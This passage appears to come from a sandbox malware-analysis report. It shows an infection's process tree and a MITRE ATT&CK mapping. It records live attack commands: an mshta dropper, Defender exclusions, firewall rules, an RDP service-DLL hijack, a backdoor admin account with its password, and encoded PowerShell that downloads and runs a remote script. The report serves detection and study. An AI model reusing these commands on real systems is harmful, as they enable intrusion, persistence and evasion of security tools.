                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,2870539763487307749,2634120370468598849,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5484_1150154333" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --mojo-platform-channel-handle=2544 /prefetch:1
                                                                                                                                            5⤵
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:12928
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,2870539763487307749,2634120370468598849,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5484_1150154333" --mojo-platform-channel-handle=1924 /prefetch:8
                                                                                                                                            5⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:13096
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,2870539763487307749,2634120370468598849,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5484_1150154333" --mojo-platform-channel-handle=2788 /prefetch:8
                                                                                                                                            5⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:13272
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,2870539763487307749,2634120370468598849,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5484_1150154333" --mojo-platform-channel-handle=3340 /prefetch:8
                                                                                                                                            5⤵
                                                                                                                                              PID:14724
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,2870539763487307749,2634120370468598849,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5484_1150154333" --mojo-platform-channel-handle=1896 /prefetch:8
                                                                                                                                              5⤵
                                                                                                                                                PID:19600
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,2870539763487307749,2634120370468598849,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5484_1150154333" --mojo-platform-channel-handle=3368 /prefetch:8
                                                                                                                                                5⤵
                                                                                                                                                  PID:19676
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                          8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                          1⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:3208
                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                            "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                            2⤵
                                                                                                                                              PID:4632
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                3⤵
                                                                                                                                                  PID:3788
                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                2⤵
                                                                                                                                                  PID:3572
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3552
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                        4⤵
                                                                                                                                                          PID:4660
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:4936
                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                            4⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:5392
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill -im "p0bzK61gNo9ZHP8VhUMpaiap.exe" -F
                                                                                                                                                      1⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:2024
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                      1⤵
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:5316
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5480
                                                                                                                                                      • C:\Windows\System32\netsh.exe
                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5592
                                                                                                                                                        • C:\Windows\System32\netsh.exe
                                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5716
                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            PID:596
                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                              2⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              PID:2416
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\EA72.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\EA72.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops startup file
                                                                                                                                                            PID:3608
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                                                              2⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                              PID:964
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4C3A.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4C3A.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5136
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8481.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\8481.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:26972
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                                                                                                                                                2⤵
                                                                                                                                                                • Deletes itself
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                PID:18820
                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jzm10ehu\jzm10ehu.cmdline"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:19264
                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3210.tmp" "c:\Users\Admin\AppData\Local\Temp\jzm10ehu\CSC9A7E50BBAB34AE5BCE07720658A02B.TMP"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:19308
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:19884
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:21176
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:21812
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:22276
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Modifies registry key
                                                                                                                                                                              PID:22300
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:22312
                                                                                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                                                                                "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:22504
                                                                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                                                                    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:22532
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:22652
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        cmd /c net start rdpdr
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:22680
                                                                                                                                                                                          • C:\Windows\system32\net.exe
                                                                                                                                                                                            net start rdpdr
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:22696
                                                                                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                                                                                C:\Windows\system32\net1 start rdpdr
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:22708
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:22728
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                cmd /c net start TermService
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:22740
                                                                                                                                                                                                  • C:\Windows\system32\net.exe
                                                                                                                                                                                                    net start TermService
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:22752
                                                                                                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                                                                                                        C:\Windows\system32\net1 start TermService
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:22768
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:25592
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:25608
                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:13144
                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      PID:14380
                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding B252FA777E03B082423051DF568FA150 C
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:16496
                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding D3F722F397C4A566BF3B7EBF3215F30C
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                          PID:18452
                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                            PID:18588
                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding D5AFFB1617B634971B6C2730D9EB50C4 E Global\MSI0000
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:18996
                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                          PID:14464
                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                            PID:15132
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          cmd /C net.exe user WgaUtilAcc 000000 /del
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:22832
                                                                                                                                                                                                            • C:\Windows\system32\net.exe
                                                                                                                                                                                                              net.exe user WgaUtilAcc 000000 /del
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:22872
                                                                                                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                  C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:22896
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                cmd /C net.exe user WgaUtilAcc NKbhLyYD /add
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:22916
                                                                                                                                                                                                                  • C:\Windows\system32\net.exe
                                                                                                                                                                                                                    net.exe user WgaUtilAcc NKbhLyYD /add
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:22972
                                                                                                                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                        C:\Windows\system32\net1 user WgaUtilAcc NKbhLyYD /add
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:22992
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:23024
                                                                                                                                                                                                                        • C:\Windows\system32\net.exe
                                                                                                                                                                                                                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:23064
                                                                                                                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:23076
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            cmd /C net.exe LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:23148
                                                                                                                                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                net.exe LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:23188
                                                                                                                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:23204
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:23220
                                                                                                                                                                                                                                    • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                      net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:23260
                                                                                                                                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                          C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:23276
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        cmd /C net.exe user WgaUtilAcc NKbhLyYD
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:23292
                                                                                                                                                                                                                                          • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                            net.exe user WgaUtilAcc NKbhLyYD
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:23332
                                                                                                                                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                                C:\Windows\system32\net1 user WgaUtilAcc NKbhLyYD
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:23348
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              cmd.exe /C wmic path win32_VideoController get name
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:23368
                                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                  wmic path win32_VideoController get name
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:23428
                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  cmd.exe /C wmic CPU get NAME
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:23468
                                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                      wmic CPU get NAME
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                      PID:23508
                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:23540
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:23588
                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                            PID:23600

                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                                                      Account Manipulation

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1098

                                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                      BITS Jobs

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1197

                                                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                                      5
                                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                      BITS Jobs

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1197

                                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                                      Software Discovery

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1518

                                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                                      7
                                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                                      7
                                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                                      Security Software Discovery

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1063

                                                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                                                      Lateral Movement

                                                                                                                                                                                                                                                      Remote Desktop Protocol

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1076

                                                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                                                                                                                                        MD5

